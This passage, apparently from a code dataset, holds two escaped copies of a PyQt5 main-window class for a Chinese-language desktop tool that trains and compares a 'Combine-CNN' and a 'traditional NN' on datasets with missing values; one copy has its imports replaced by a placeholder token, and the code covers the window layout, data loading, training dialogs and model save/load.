labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n 
dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n 
self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n self.trainingW.show()\n return\n senderName = 'New'\n elif self.sender() is 
self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n senderName = 'Tra'\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n elif senderName == 'New':\n if self.dataFor[senderName].DataTrainX.shape[1\n ] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误',\n '卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)\n return\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].\n DataTrainX.shape[1], self.combineNumConv\n ) < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误',\n '池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示',\n 'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',\n self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示',\n 'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'\n , self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif 
self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelNameT.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def showResult(self):\n if self.sender() is self.showResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'combine-CNN预测结果展示', self, 'New')\n elif self.sender() is self.showResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.showResultW = showResultWidget.ShowResultWidget(\n 'traditional NN预测结果展示', self, 'Tra')\n return\n\n def showJudge(self):\n if self.sender() is self.judgeResultButton:\n if self.traingWidgetOnFlag['New']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'New'))\n elif self.sender() is self.judgeResultButtonT:\n if self.traingWidgetOnFlag['Tra']:\n reply = QMessageBox.information(self, '提示', '训练正在进行',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n self.chooseJDWin = (chooseJudgeDataSetWidget.\n chooseJudgeDataSetWidget(\n 'Choose Judgement-based-on Data Set', self, 'Tra'))\n\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n myMainWindow = MyMainWindow()\n sys.exit(app.exec_())\n", "<import token>\n\n\nclass MyMainWindow(QMainWindow):\n\n def __init__(self):\n super().__init__()\n self.windowLength = 1250\n self.windowHigh = 900\n self.fname = dict()\n self.fname['New'] = None\n self.fname['Tra'] = None\n self.dataLossRate = dict()\n self.dataSetLossValue = dict()\n self.dataFor = dict()\n self.dataFor['New'] = None\n self.dataLossRate['New'] = 0.0\n self.dataSetLossValue['New'] = 0.0\n self.dataFor['Tra'] = None\n self.dataLossRate['Tra'] = 0.0\n self.dataSetLossValue['Tra'] = 0.0\n self.traingWidgetOnFlag = dict()\n self.traingWidgetOnFlag['New'] = False\n self.traingWidgetOnFlag['Tra'] = False\n self.combineNumConv = 2\n self.convCoreNum = 5\n self.combineNumPooling = 4\n self.fullConnectOutInRate = 0.5\n self.mcbcnn = None\n self.trann = None\n self.trainingW = None\n self.trainingWT = None\n self.initUI()\n self.initConnect()\n\n def initUI(self):\n self.statusBar().showMessage('Ready')\n dataModule = QVBoxLayout()\n self.dataFileChooseButton = QPushButton('选择数据')\n self.dataFileChooseButton.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButton = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButton.setFont(QFont('微软雅黑', 16))\n self.dataShowButton = QPushButton('展示数据')\n self.dataShowButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataName = QLabel('None')\n self.presentDataName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n 
labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataName)\n dataModule.addStretch(1)\n dataModule.addLayout(labelbox)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataFileChooseButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataLossSimulateSettingButton)\n dataModule.addStretch(1)\n dataModule.addWidget(self.dataShowButton)\n dataModule.addStretch(1)\n trainingModule = QVBoxLayout()\n self.setModelParametersButton = QPushButton('Model Parameters')\n self.setModelParametersButton.setFont(QFont('微软雅黑', 16))\n self.trainingButton = QPushButton('Training')\n self.trainingButton.setFont(QFont('微软雅黑', 16))\n self.saveModelButton = QPushButton('Save Model')\n self.saveModelButton.setFont(QFont('微软雅黑', 16))\n self.loadModelButton = QPushButton('Load Model')\n self.loadModelButton.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelName = QLabel('None')\n self.presentModelName.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelName)\n trainingModule.addStretch(1)\n trainingModule.addLayout(labelbox)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.setModelParametersButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.trainingButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.saveModelButton)\n trainingModule.addStretch(1)\n trainingModule.addWidget(self.loadModelButton)\n trainingModule.addStretch(1)\n resultShowModule = QVBoxLayout()\n self.showResultButton = QPushButton('分类结果展示')\n self.showResultButton.setFont(QFont('微软雅黑', 16))\n self.judgeResultButton = QPushButton('分类结果评估')\n self.judgeResultButton.setFont(QFont('微软雅黑', 16))\n resultShowModule.addWidget(self.showResultButton)\n resultShowModule.addWidget(self.judgeResultButton)\n hboxTop = QHBoxLayout()\n hboxTop.addStretch(1)\n mcnnLabel = QLabel('Combine-CNN:')\n mcnnLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxTop.addWidget(mcnnLabel)\n hboxTop.addStretch(1)\n hboxTop.addLayout(dataModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(trainingModule)\n hboxTop.addStretch(1)\n hboxTop.addLayout(resultShowModule)\n hboxTop.addStretch(1)\n dataModuleT = QVBoxLayout()\n self.dataFileChooseButtonT = QPushButton('选择数据')\n self.dataFileChooseButtonT.setFont(QFont('微软雅黑', 16))\n self.dataLossSimulateSettingButtonT = QPushButton('设置数据缺失参数')\n self.dataLossSimulateSettingButtonT.setFont(QFont('微软雅黑', 16))\n self.dataPreProcessButtonT = QPushButton('数据预处理')\n self.dataPreProcessButtonT.setFont(QFont('微软雅黑', 16))\n self.dataShowButtonT = QPushButton('展示数据')\n self.dataShowButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Data:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentDataNameT = QLabel('None')\n self.presentDataNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentDataNameT)\n dataModuleT.addStretch(1)\n dataModuleT.addLayout(labelbox)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataFileChooseButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataLossSimulateSettingButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataPreProcessButtonT)\n dataModuleT.addStretch(1)\n dataModuleT.addWidget(self.dataShowButtonT)\n dataModuleT.addStretch(1)\n trainingModuleT = QVBoxLayout()\n self.setModelParametersButtonT = QPushButton('Model Parameters')\n self.setModelParametersButtonT.setFont(QFont('微软雅黑', 16))\n 
self.trainingButtonT = QPushButton('Training')\n self.trainingButtonT.setFont(QFont('微软雅黑', 16))\n self.saveModelButtonT = QPushButton('Save Model')\n self.saveModelButtonT.setFont(QFont('微软雅黑', 16))\n self.loadModelButtonT = QPushButton('Load Model')\n self.loadModelButtonT.setFont(QFont('微软雅黑', 16))\n label = QLabel('Present Model:')\n label.setFont(QFont('微软雅黑', 16))\n self.presentModelNameT = QLabel('None')\n self.presentModelNameT.setFont(QFont('微软雅黑', 16))\n labelbox = QVBoxLayout()\n labelbox.addWidget(label)\n labelbox.addWidget(self.presentModelNameT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addLayout(labelbox)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.setModelParametersButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.trainingButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.saveModelButtonT)\n trainingModuleT.addStretch(1)\n trainingModuleT.addWidget(self.loadModelButtonT)\n trainingModuleT.addStretch(1)\n resultShowModuleT = QVBoxLayout()\n self.showResultButtonT = QPushButton('分类结果展示')\n self.showResultButtonT.setFont(QFont('微软雅黑', 16))\n self.judgeResultButtonT = QPushButton('分类结果评估')\n self.judgeResultButtonT.setFont(QFont('微软雅黑', 16))\n resultShowModuleT.addWidget(self.showResultButtonT)\n resultShowModuleT.addWidget(self.judgeResultButtonT)\n hboxBottom = QHBoxLayout(self)\n hboxBottom.addStretch(1)\n traditionNNLabel = QLabel('Traditional NN:')\n traditionNNLabel.setFont(QFont('微软雅黑', 24, QFont.Bold))\n hboxBottom.addWidget(traditionNNLabel)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(dataModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(trainingModuleT)\n hboxBottom.addStretch(1)\n hboxBottom.addLayout(resultShowModuleT)\n hboxBottom.addStretch(1)\n splitterLine = QLabel(self)\n splitterLine.setFont(QFont('Times', 1))\n col = QColor(0, 0, 0)\n splitterLine.setStyleSheet('QWidget { background-color: %s }' % col\n .name())\n splitterLine.resize(splitterLine.sizeHint())\n vbox = QVBoxLayout()\n vbox.addLayout(hboxTop)\n vbox.addWidget(splitterLine)\n vbox.addLayout(hboxBottom)\n mainWidget = QWidget()\n mainWidget.setLayout(vbox)\n self.setCentralWidget(mainWidget)\n self.setGeometry(350, 100, self.windowLength, self.windowHigh)\n self.setWindowTitle('适用于有缺失值数据集的神经网络系统')\n self.show()\n\n def initConnect(self):\n self.dataFileChooseButton.clicked.connect(self.chooseData)\n self.dataFileChooseButtonT.clicked.connect(self.chooseData)\n self.dataLossSimulateSettingButton.clicked.connect(self.\n setLossParameter)\n self.dataLossSimulateSettingButtonT.clicked.connect(self.\n setLossParameter)\n self.dataShowButton.clicked.connect(self.showData)\n self.dataShowButtonT.clicked.connect(self.showData)\n self.dataPreProcessButtonT.clicked.connect(self.preProcess)\n self.setModelParametersButton.clicked.connect(self.setModelParameters)\n self.setModelParametersButtonT.clicked.connect(self.setModelParameters)\n self.trainingButton.clicked.connect(self.training)\n self.trainingButtonT.clicked.connect(self.training)\n self.saveModelButton.clicked.connect(self.saveModel)\n self.saveModelButtonT.clicked.connect(self.saveModel)\n self.loadModelButton.clicked.connect(self.loadModel)\n self.loadModelButtonT.clicked.connect(self.loadModel)\n self.showResultButton.clicked.connect(self.showResult)\n self.showResultButtonT.clicked.connect(self.showResult)\n self.judgeResultButton.clicked.connect(self.showJudge)\n self.judgeResultButtonT.clicked.connect(self.showJudge)\n\n def chooseData(self):\n if 
self.sender() is self.dataFileChooseButton:\n self.fname['New'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n elif self.sender() is self.dataFileChooseButtonT:\n self.fname['Tra'], ok = QFileDialog.getOpenFileName(self,\n 'Open file', '..', 'Text files (*.txt)')\n if ok:\n self.loadData()\n return\n\n def loadData(self):\n if self.sender() is self.dataFileChooseButton:\n try:\n self.dataFor['New'] = myLoadData.loadData(self.fname['New'],\n self.dataLossRate['New'], self.dataSetLossValue['New'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['New'].split('/')[-1].split('.')[0]\n self.presentDataName.setText(dataname)\n self.presentDataName.resize(self.presentDataName.sizeHint())\n elif self.sender() is self.dataFileChooseButtonT:\n try:\n self.dataFor['Tra'] = myLoadData.loadData(self.fname['Tra'],\n self.dataLossRate['Tra'], self.dataSetLossValue['Tra'])\n except FileNotFoundError as e:\n reply = QMessageBox.information(self, 'Message',\n 'Data file not exist', QMessageBox.Yes, QMessageBox.Yes)\n return\n except Exception:\n reply = QMessageBox.information(self, 'Message',\n 'Data file format error', QMessageBox.Yes, QMessageBox.Yes)\n return\n dataname = self.fname['Tra'].split('/')[-1].split('.')[0]\n self.presentDataNameT.setText(dataname)\n self.presentDataNameT.resize(self.presentDataNameT.sizeHint())\n return\n\n def setLossParameter(self):\n if self.sender() is self.dataLossSimulateSettingButton:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'combine-CNN设置缺失参数', self, 'New')\n elif self.sender() is self.dataLossSimulateSettingButtonT:\n self.setLPDialog = setLossParameterDialog.setLossParameterDialog(\n 'traditional NN设置缺失参数', self, 'Tra')\n return\n\n def showData(self):\n if self.sender() is self.dataShowButton:\n self.showDataW = showDataWidget.ShowDataWidget('combine-CNN数据展示',\n self, 'New')\n elif self.sender() is self.dataShowButtonT:\n self.showDataW = showDataWidget.ShowDataWidget('traditional NN数据展示'\n , self, 'Tra')\n return\n\n def preProcess(self):\n if self.dataFor['Tra'] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法预处理',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n self.dataFor['Tra'].MeanPreProcess()\n reply = QMessageBox.information(self, 'Message',\n 'PreProcess succeed!', QMessageBox.Yes, QMessageBox.Yes)\n return\n\n def setModelParameters(self):\n if self.sender() is self.setModelParametersButton:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('combine-CNN模型参数设置', self, 'New'))\n elif self.sender() is self.setModelParametersButtonT:\n self.setModelParaW = (setModelParametersDialog.\n setLossParameterDialog('traditional NN模型参数设置', self, 'Tra'))\n\n def training(self):\n if self.sender() is self.trainingButton:\n if self.trainingW is not None:\n self.trainingW.hide()\n self.trainingW.show()\n return\n senderName = 'New'\n elif self.sender() is self.trainingButtonT:\n if self.trainingWT is not None:\n self.trainingWT.hide()\n self.trainingWT.show()\n senderName = 'Tra'\n if self.dataFor[senderName] is None:\n reply = QMessageBox.information(self, '数据错误', '没有加载数据,无法训练',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n elif senderName == 'New':\n if 
self.dataFor[senderName].DataTrainX.shape[1\n ] < self.combineNumConv:\n reply = QMessageBox.information(self, '参数错误',\n '卷积层组合(卷积核)大小大于数据集特征数量', QMessageBox.Yes, QMessageBox.Yes)\n return\n if combineNumCalculate.combineNumCal(self.dataFor[senderName].\n DataTrainX.shape[1], self.combineNumConv\n ) < self.combineNumPooling:\n reply = QMessageBox.information(self, '参数错误',\n '池化层组合(池化核)大小大于卷积层输出特征向量维度', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n if self.trainingWT is not None:\n reply = QMessageBox.information(self, '提示',\n 'traditional NN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingW = TrainingWidget.trainningWidget('combine-CNN训练',\n self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n elif senderName == 'Tra':\n if self.trainingW is not None:\n reply = QMessageBox.information(self, '提示',\n 'combine-CNN训练正在进行,请等待其结束', QMessageBox.Yes,\n QMessageBox.Yes)\n return\n self.trainingWT = TrainingWidget.trainningWidget('traditional NN训练'\n , self, senderName)\n self.traingWidgetOnFlag[senderName] = False\n return\n\n def saveModel(self):\n if self.sender() is self.saveModelButton:\n if self.mcbcnn is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\myCombineCNN.cbcnn.json',\n 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n succeed = self.mcbcnn.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.saveModelButtonT:\n if self.trann is None:\n reply = QMessageBox.information(self, '模型错误', '模型不存在',\n QMessageBox.Yes, QMessageBox.Yes)\n return\n else:\n fname, ok = QFileDialog.getSaveFileName(self, 'Save Model',\n '..\\\\traditionalNN.trann.json',\n 'Traditional NN json files (*.trann.json)')\n if ok:\n succeed = self.trann.saveModel(fname)\n if succeed:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存成功', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果',\n '模型保存失败', QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '保存结果', '模型保存失败',\n QMessageBox.Yes, QMessageBox.Yes)\n\n def loadModel(self):\n if self.sender() is self.loadModelButton:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Combine-CNN json files (*.cbcnn.json)')\n if ok:\n if self.mcbcnn is None:\n self.mcbcnn = myCombineCNN.myCombineCNN(None, self.\n combineNumConv, self.convCoreNum, self.\n combineNumPooling)\n succeed = self.mcbcnn.setModel(fname)\n if succeed:\n modelName = fname.split('/')[-1].split('.')[0]\n self.presentModelName.setText(modelName)\n reply = QMessageBox.information(self, '设置结果', '模型设置成功',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n else:\n reply = QMessageBox.information(self, '设置结果', '模型设置失败',\n QMessageBox.Yes, QMessageBox.Yes)\n elif self.sender() is self.loadModelButtonT:\n fname, ok = QFileDialog.getOpenFileName(self, 'Load Model',\n '..', 'Traditional NN json files (*.trann.json)')\n if ok:\n if self.trann is None:\n self.trann = traditionalNN.traditionalNN(None)\n succeed = self.trann.setModel(fname)\n if succeed:\n modelName = 
